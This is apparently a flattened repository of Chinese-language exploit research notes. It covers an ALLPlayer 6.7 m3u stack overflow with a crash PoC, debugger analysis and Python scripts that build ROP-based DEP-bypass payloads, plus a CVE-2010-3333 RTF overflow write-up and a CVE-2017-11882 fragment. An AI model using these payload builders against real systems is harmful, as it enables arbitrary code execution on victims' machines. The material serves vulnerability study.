| 在栈中布置shellcode同时覆盖SEH, 162 | 然后利用rop结合ZwSetInformationProcess关掉DEP 163 | 最后跳转到栈中执行shellcode 164 | -------------------------------------------------------------------------------- /File Format Vulnerability/ALLPlayerEN_6.7_stackoverflow/ALLPlayer_Poc.m3u: -------------------------------------------------------------------------------- 1 | http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -------------------------------------------------------------------------------- /File Format Vulnerability/ALLPlayerEN_6.7_stackoverflow/analysis.txt: -------------------------------------------------------------------------------- 1 | 1.结合poc定位漏洞 2 | ### 从github上找到了poc,用ALLPlayer打开poc生成的ALLPlayer_Poc.m3u,程序崩溃 3 | This exception may be expected and handled. 4 | eax=00120041 ebx=066bb35c ecx=00130000 edx=066bc8d4 esi=00001390 edi=00000000 5 | eip=7c932f4e esp=0012ea2c ebp=0012ea2c iopl=0 nv up ei pl nz na pe nc 6 | cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206 7 | ntdll!wcscpy+0xe: 8 | 7c932f4e 668901 mov word ptr [ecx],ax ds:0023:00130000=6341 9 | 10 | ntdll!wcscpy: ### wcscpy把从src地址开始且含有'\0000'结束符的字符串复制到以dest开始的地址空间,返回值的类型为wchar_t* #Unicode 11 | 7c932f40 8bff mov edi,edi 12 | 7c932f42 55 push ebp 13 | 7c932f43 8bec mov ebp,esp 14 | 7c932f45 8b4d08 mov ecx,dword ptr [ebp+8] #char *strDestination 15 | 7c932f48 8b550c mov edx,dword ptr [ebp+0Ch] #char *strSource 16 | 17 | 7c932f4b 668b02 mov ax,word ptr [edx] 18 | 7c932f4e 668901 mov word ptr [ecx],ax ds:0023:00130000=6341 19 | #wcscpy函数 20 | # __int16 *__cdecl wcscpy(__int16 *a1, __int16 *a2) 21 | # { 22 | # __int16 *des; // ecx 23 | # __int16 *sou; // edx 24 | # __int16 index; // ax 25 | 26 | # des = a1; 27 | # sou = a2; 28 | # do 29 | # { 30 | # index = *sou; 31 | # *des = *sou; 32 | # ++des; 33 | # ++sou; 34 | # } 35 | # while ( index ); 36 | # return a1; 37 | # } 38 | # 39 | 0:000> dd ebp 40 | 0012ea2c 0012ea60 7c80bb10 0012ea88 066bb35c 41 | 42 | 0:000> dd 0012ea88 43 | 0012ea88 00740068 00700074 002f003a 0041002f 44 | 0012ea98 00410041 00410041 00410041 00410041 45 | 0012eaa8 00410041 00410041 00410041 00410041 46 | 0012eab8 00410041 00410041 00410041 00410041 47 | 0012eac8 00410041 00410041 00410041 00410041 48 | 0012ead8 00410041 00410041 00410041 00410041 49 | 0012eae8 00410041 00410041 00410041 00410041 50 | 0012eaf8 00410041 00410041 00410041 00410041 51 | 52 | 0:000> dd 066bb35c 53 | 066bb35c 00740068 00700074 002f003a 0041002f 54 | 066bb36c 00410041 00410041 00410041 00410041 55 | 066bb37c 00410041 00410041 00410041 00410041 56 | 066bb38c 00410041 00410041 00410041 00410041 57 | 066bb39c 00410041 00410041 00410041 00410041 58 | 066bb3ac 00410041 00410041 00410041 00410041 59 | 066bb3bc 00410041 00410041 00410041 00410041 60 | 066bb3cc 00410041 00410041 00410041 00410041 61 | 62 | 63 | 0:000> kv 64 | ChildEBP RetAddr Args to Child 65 | 0012ea2c 7c80bb10 0012ea88 066cb35c 00000000 ntdll!wcscpy+0xe (FPO: [Non-Fpo]) 66 | 0012ea60 00699632 0012ea88 066cb35c 0012ecf0 kernel32!lstrcpyW+0x1c (FPO: [Non-Fpo]) 67 | WARNING: Stack unwind information not available. Following frames may be wrong. 68 | 0012ecdc 00410041 00410041 00410041 00410041 ALLPlayer!TMethodImplementationIntercept+0x22cb3e 69 | 0012ece0 00410041 00410041 00410041 00410041 ALLPlayer+0x10041 70 | ##可以看到ALLPlayer!TMethodImplementationIntercept+0x22cb3e是ntdll!wcscpy的调用者 71 | 72 | #在ida中找到ALLPlayer!TMethodImplementationIntercept+0x22cb3e处 73 | .text:0069960A loc_69960A: ; CODE XREF: .text:006995FC↑j 74 | .text:0069960A push ebx 75 | .text:0069960B call lstrlenW_0_0 76 | .text:00699610 mov esi, eax 77 | .text:00699612 inc esi 78 | .text:00699613 lea eax, [ebp-254h] 79 | .text:00699619 xor ecx, ecx 80 | .text:0069961B mov edx, 104h 81 | .text:00699620 call sub_407B64 82 | .text:00699625 push ebx <-------------- 源字符串 83 | .text:00699626 lea eax, [ebp-254h] 84 | .text:0069962C push eax <---------------目标缓冲区 85 | .text:0069962D call lstrcpyW <-------------- 崩溃触发点 86 | .text:00699632 mov eax, [ebp+8] 87 | 88 | #在该函数中下断再重新打开ALLPlayer_Poc.m3u,断下 89 | 0:005> bp ALLPlayer!TMethodImplementationIntercept+0x22cb1e 90 | 0:005> g 91 | Breakpoint 1 hit 92 | eax=0000138f ebx=066bb35c ecx=7c809ac6 edx=0000000a esi=0000138f edi=00000000 93 | eip=00699612 esp=0012ea70 ebp=0012ecdc iopl=0 nv up ei ng nz na pe nc 94 | cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200286 95 | ALLPlayer!TMethodImplementationIntercept+0x22cb1e: 96 | 00699612 46 inc esi 97 | 98 | 0:000> dd eax 99 | 0012ea88 00000000 00000000 00000000 00000000 100 | 0012ea98 00000000 00000000 00000000 00000000 101 | 0012eaa8 00000000 00000000 00000000 00000000 102 | 0012eab8 00000000 00000000 00000000 00000000 103 | 0012eac8 00000000 00000000 00000000 00000000 104 | 0012ead8 00000000 00000000 00000000 00000000 105 | 0012eae8 00000000 00000000 00000000 00000000 106 | 0012eaf8 00000000 00000000 00000000 00000000 107 | 0:000> dd ebx 108 | 066bb35c 00740068 00700074 002f003a 0041002f 109 | 066bb36c 00410041 00410041 00410041 00410041 110 | 066bb37c 00410041 00410041 00410041 00410041 111 | 066bb38c 00410041 00410041 00410041 00410041 112 | 066bb39c 00410041 00410041 00410041 00410041 113 | 066bb3ac 00410041 00410041 00410041 00410041 114 | 066bb3bc 00410041 00410041 00410041 00410041 115 | 066bb3cc 00410041 00410041 00410041 00410041 116 | 0:000> dd esp 117 | 0012ea6c 066bb35c 0012ecf0 00699791 0012ecdc 118 | 0012ea7c 00b55bf8 066bb35c 00000000 00000000 119 | 0012ea8c 00000000 00000000 00000000 00000000 120 | 0012ea9c 00000000 00000000 00000000 00000000 121 | 0012eaac 00000000 00000000 00000000 00000000 122 | 0012eabc 00000000 00000000 00000000 00000000 123 | 0012eacc 00000000 00000000 00000000 00000000 124 | 0012eadc 00000000 00000000 00000000 00000000 125 | 126 | ##至此我们知道这是一个栈溢出,当ebx中的字符串足够长时,会覆盖函数返回地址 127 | # 128 | 2.漏洞利用 129 | 障碍:实验环境winxp sp3 开启了DEP保护 130 | 思路: 131 | 1)通过构造ROP构造出可以执行的内存块 132 | 2)利用SEH 133 | 在栈中布置shellcode同时覆盖SEH, 134 | 然后利用rop结合ZwSetInformationProcess关掉DEP 135 | 最后跳转到栈中执行shellcode 136 | 137 | -------------------------------------------------------------------------------- /File Format Vulnerability/ALLPlayerEN_6.7_stackoverflow/calc.m3u: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/ALLPlayerEN_6.7_stackoverflow/calc.m3u -------------------------------------------------------------------------------- /File Format Vulnerability/ALLPlayerEN_6.7_stackoverflow/exp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | import codecs 4 | import cStringIO 5 | filename = 'rekt.m3u' 6 | 7 | shellcode = '' 8 | shellcode += u"\ue252\u7c92" #MOV EAX,1 RETN 地址 9 | shellcode += u"\u8885\u5d1D" #修正 EBP 10 | shellcode += u"\u4a19\u7c97" #增大 ESP 11 | shellcode += u"\uc1B4\u7dC5" #jmp esp 12 | shellcode += u"\uCD24\u7c93" #关闭 DEP 代码的起始位置 13 | shellcode += u"\u33E9\uFFFF" #回跳指令 14 | shellcode += u"\u90FF\u9090" 15 | 16 | junk = "http://a" 17 | buffer= u"\u9090\u9090" * ((0x0012ecdc - 0x0012ea98)/4 + 1) 18 | payload = junk + buffer# + shellcode 19 | data = codecs.open(filename,'w','UTF-16') 20 | data.write(payload) 21 | data.close() 22 | print '[*] File created' 23 | print '[*] With {} bytes'.format(len(payload)) 24 | 25 | # titleUni = titleHtml.decode(“UTF-8”, ‘ignore’); 26 | # 0012ea88 00000000 00000000 00000000 00000000 <-eax 27 | # 0012ea98 28 | # 0012ecdc 0012ed6c 0088f09f 7fe90010 066bb35c <-ebp 29 | # Found:MOV EAX,0x1 RET at 0x7c92e252 Module: C:\WINDOWS\system32\ntdll.dll 30 | # Found:disable DEP at 0x7c93cd24 Module: C:\WINDOWS\system32\ntdll.dll 31 | 32 | #writer = csv.writer(openUCS-4test.txt', 'w', 'utf-8') 33 | # f.write(content) 34 | 35 | # 0x5D1D8B85 处的 PUSH ESP POP EBP RETN 04 指令来修正 EBP 36 | 37 | 38 | # "……" 39 | # "\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50" 40 | # "\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90\x90\x90\x90\x90\x90\x90\x90" 41 | # "\x90\x90\x90\x90" 42 | # "\x52\xE2\x92\x7C" //MOV EAX,1 RETN 地址 43 | # "\x85\x8B\x1D\x5D" //修正 EBP 44 | # "\x19\x4A\x97\x7C" //增大 ESP 45 | # "\xB4\xC1\xC5\x7D" //jmp esp 46 | # "\x24\xCD\x93\x7C" //关闭 DEP 代码的起始位置 47 | # "\xE9\x33\xFF\xFF" //回跳指令 48 | # "\xFF\x90\x90\x90" 49 | # 50 | # 51 | 0:000> dd 0012ea70 52 | 0012ea70 0012ecf0 00699791 0012ecdc 00b55bf8 53 | 0012ea80 0512efec 00000000 00740068 00700074 54 | 0012ea90 002f003a 0061002f 90909090 90909090 55 | 0012eaa0 90909090 90909090 90909090 90909090 56 | 0012eab0 90909090 90909090 90909090 90909090 57 | 0012eac0 90909090 90909090 90909090 90909090 58 | 0012ead0 90909090 90909090 90909090 90909090 59 | 0012eae0 90909090 90909090 90909090 90909090 60 | 61 | 0:000> dd esp 62 | 0012ea64 0012ea70 0069976e 0012ecdc 0012ecf0 63 | 0012ea74 00699791 0012ecdc 00b55bf8 0512efec 64 | 0012ea84 00000000 00740068 00700074 002f003a 65 | 0012ea94 0061002f 90909090 90909090 90909090 66 | 0012eaa4 90909090 90909090 90909090 90909090 67 | 0012eab4 90909090 90909090 90909090 90909090 68 | 0012eac4 90909090 90909090 90909090 90909090 69 | 0012ead4 90909090 90909090 90909090 90909090 70 | -------------------------------------------------------------------------------- /File Format Vulnerability/ALLPlayerEN_6.7_stackoverflow/exp1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | import codecs 4 | import cStringIO 5 | filename = 'calc.m3u' 6 | 7 | junk = "http://a" 8 | 9 | buffer = u"\u9090\u9090" * (200 - 50) 10 | 11 | # moonagirl = u'\uDB33\u6853\u6C72\u2020\u6E68\u6761\u6869\u6D20\u6F6F\u6968' 12 | # moonagirl += u'\u6120\u8B6D\u53C4\u5050\uB853\u07EA\u77D5\uD0FF\uB853' 13 | # moonagirl += u'\uCAFA\u7C81\uD0FF' 14 | 15 | shellcode = u"\ucccc\ucccc" 16 | shellcode += u"\ue252\u7c92" #MOV EAX,1 RETN 地址 17 | #shellcode += u'\u00cc\u00cc' 18 | #shellcode += u'\u002d\u004f' 19 | shellcode += u"\uaef5\u0078" #MOV EAX,1 RETN 地址 20 | shellcode += u"\u8885\u5d1D" #修正 EBP 21 | shellcode += u"\u4a19\u7c97" #增大 ESP 22 | shellcode += u"\uc1B4\u7dC5" #jmp esp 23 | shellcode += u"\uCD24\u7c93" #关闭 DEP 代码的起始位置 24 | shellcode += u"\u33E9\uFFFF" #回跳指令 25 | shellcode += u"\u90FF\u9090" 26 | 27 | payload = junk + buffer + shellcode 28 | data = codecs.open(filename,'w','UTF-16') 29 | data.write(payload) 30 | data.close() 31 | print '[*] File created' 32 | print '[*] With {} bytes'.format(len(payload)) 33 | 34 | 35 | 36 | 37 | 38 | # shellcode = '' 39 | # shellcode += u"\ue252\u7c92" #MOV EAX,1 RETN 地址 40 | # shellcode += u"\u8885\u5d1D" #修正 EBP 41 | # shellcode += u"\u4a19\u7c97" #增大 ESP 42 | # shellcode += u"\uc1B4\u7dC5" #jmp esp 43 | # shellcode += u"\uCD24\u7c93" #关闭 DEP 代码的起始位置 44 | # shellcode += u"\u33E9\uFFFF" #回跳指令 45 | # shellcode += u"\u90FF\u9090" 46 | 47 | 48 | -------------------------------------------------------------------------------- /File Format Vulnerability/ALLPlayerEN_6.7_stackoverflow/ntdll.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/ALLPlayerEN_6.7_stackoverflow/ntdll.dll -------------------------------------------------------------------------------- /File Format Vulnerability/ALLPlayerEN_6.7_stackoverflow/ntdll.idb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/ALLPlayerEN_6.7_stackoverflow/ntdll.idb -------------------------------------------------------------------------------- /File Format Vulnerability/ALLPlayerEN_6.7_stackoverflow/player.m3u: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/ALLPlayerEN_6.7_stackoverflow/player.m3u -------------------------------------------------------------------------------- /File Format Vulnerability/ALLPlayerEN_6.7_stackoverflow/poc.py: -------------------------------------------------------------------------------- 1 | junk = "http://" 2 | buffer="\x41" * 5000 3 | exploit = junk + buffer 4 | 5 | try: 6 | out_file = open("ALLPlayer_Poc.m3u",'w') 7 | out_file.write(exploit) 8 | out_file.close() 9 | print "Exploit file created!" 10 | except: 11 | print "Error" -------------------------------------------------------------------------------- /File Format Vulnerability/ALLPlayerEN_6.7_stackoverflow/rekt.m3u: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/ALLPlayerEN_6.7_stackoverflow/rekt.m3u -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2010-3333/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2010-3333/1.png -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2010-3333/MSO.DLL: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2010-3333/MSO.DLL -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2010-3333/analysis.md: -------------------------------------------------------------------------------- 1 | ## 漏洞成因 2 | 3 | 由于Word中的RTF分析器在解析pFragments属性值时,没有正确计算属性值所占用的空间大小,只要复制的数据大小超过0x14即可覆盖到函数返回地址, 4 | 进而控制程序的执行流程,用于执行恶意程序。 5 | 6 | (这里RTF分析器在复制数据时会把每两个相邻的数字解析成一个16进制数转成对应的ascii复制进内存。例如:在rtf中是30复制进内存被解析成0。 7 | 因此0x14个字节在rtf中要用40个垃圾字符来填充。) 8 | 9 | ## 漏洞利用 10 | 11 | 我们只需将返回地址用jmp esp指令地址覆盖,例如: 12 | 13 | ‘a’ * 40 + (jmp esp地址) 14 | 15 | 然后将shellcode放在后面,即可执行任意代码。由于漏洞函数返回前会弹出0x14大小的栈空间,因此我们需要填充一些垃圾字符。 16 | 例如: 17 | 18 | ‘a’*40 + (jmp esp地址) + 'a'*40 + shellcode. 19 | 20 | ![](./1.png) 21 | 22 | ## 补充:RTF文件格式 23 | 24 | RTF是一种在不同操作系统下不同应用软件之间进行文本和图象信息交换的文件格式。以RTF格式作为多媒体系统中文本媒体的一种输入形式,可为用户提供极大的方便。 25 | 26 | 简要分析了RTF文件格式 27 | 28 | ### RTF基本语法 29 | 30 | RTF文件由未格式化本文、控制字、控制符和组组成。RTF文件没有限制文件的行的最大长度。控制字是RTF用来标记打印控制符和管理文档信息的一种特殊格式的命令。一个控制字最长32个字符。控制字的使用格式如下: 31 | 32 | \字母序列<分隔符> 33 | 34 | 注意:每个控制字均以一个反斜杠\开头。字母序列由a~z 的小写字母组成。控制字(或者称为关键字)通常应该不包含任何大写字母。 35 | 36 | 分隔符标记RTF控制字的结束, 可以是下列各项之一: 37 | 38 | · 一个空格,这时空格是控制字的一部份。 39 | 40 | · 一个数字或连字符(-), 表示跟随的一个数值参数。该数字序列的长度由其后的一个空格或除了字母和数字 41 | 的其他字符划定。这个参数可以是正数或者负数,它的取值范围通常是从-32767到32767。 42 | 43 | · 任何非字母和数字的其他字符。这种情况下,此分隔字符结束控制字,而它并不属于控制字的一部分。 44 | 控制符由一个反斜线\跟随单个非字母字符组成。例如,\~代表一个不换行空格。控制符不需要分隔符。 45 | 46 | 组由包括在({})中的文本、控制字或控制符组成。左扩符({)表示组的开始,右扩符(})表示组的结束。每个组包括文本和文本的不同属性。RTF文件也能同时包括字体、格式、屏幕颜色、图形、脚注、注释(注解)、文件头和文件尾、摘要信息、域和书签的组合,以及文档、区段、段落和字符的格式属性。如果包括字体、文件、格式、屏幕颜色、校订标记,以及摘要信息组、文档格式属性,则他们一定要在文件的第一纯文本字符之前,这些组形成RTF的文件头。如果包括字体组,则它应该在格式组之前。如果组未使用,可以省略。 47 | 48 | 对于RTF文件的详细语法及关键字说明请参阅《Rich Text Format (RTF) Specification v1.7》,这里不作更详细的说明。 49 | 50 | ### Hello Word 51 | 52 | 一个Hello Word!演示例子,内容如下: 53 | 54 | {\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052 55 | {\fonttbl{\f0\fmodern\fprq6\fcharset134 \'cb\'ce\'cc\'e5;}} 56 | {\*\generator Msftedit 5.41.21.2500;}\viewkind4\uc1\pard\lang2052\f0\fs20 Hello World!\par} 57 | 58 | 该文件分析如下: 59 | 60 | 1、文件基本属性: 61 | {\rtf1 RTF版本\ansi字符集\ansicpg936简体中文\deff0默认字体0\deflang1033美国英语\deflangfe2052中国汉语 62 | 2、字体表: 63 | {\fonttbl{\f0字体0\fmodern\fprq6字体间距为6\fcharset134GB2312国标码 \'cb\'ce\'cc\'e5宋体;}} 64 | 3、生成器信息: 65 | {\*\generator Msftedit 5.41.21.2500;} 66 | 4、文档属性: 67 | \viewkind4正常视图\uc1单字节\pard默认段落属性\lang2052中国汉语\f0字体0\fs20字体大小20磅 68 | 5、正文文本: 69 | Hello World!\par段落标记 70 | }文件结束 71 | 72 | 73 | ## 参考链接 74 | 75 | http://interglacial.com/rtf/ 76 | 77 | -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2010-3333/unMSO.DLL: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/File Format Vulnerability/CVE-2010-3333/unMSO.DLL -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2013-7409/poc.py: -------------------------------------------------------------------------------- 1 | junk = "http://" 2 | 3 | buffer="\x41" * 5000 4 | 5 | exploit = junk + buffer 6 | 7 | try: 8 | out_file = open("ALLPlayer_Poc.m3u",'w') 9 | out_file.write(exploit) 10 | out_file.close() 11 | print "Exploit file created!" 12 | except: 13 | print "Error" -------------------------------------------------------------------------------- /File Format Vulnerability/CVE-2017-11882/DATA: -------------------------------------------------------------------------------- 1 | ---- EQNOLEFILEHDR ---- 2 | 3 | 1C 00 -> cbHdr 4 | 00 00 02 00 -> version 5 | 9E C4 -> cf 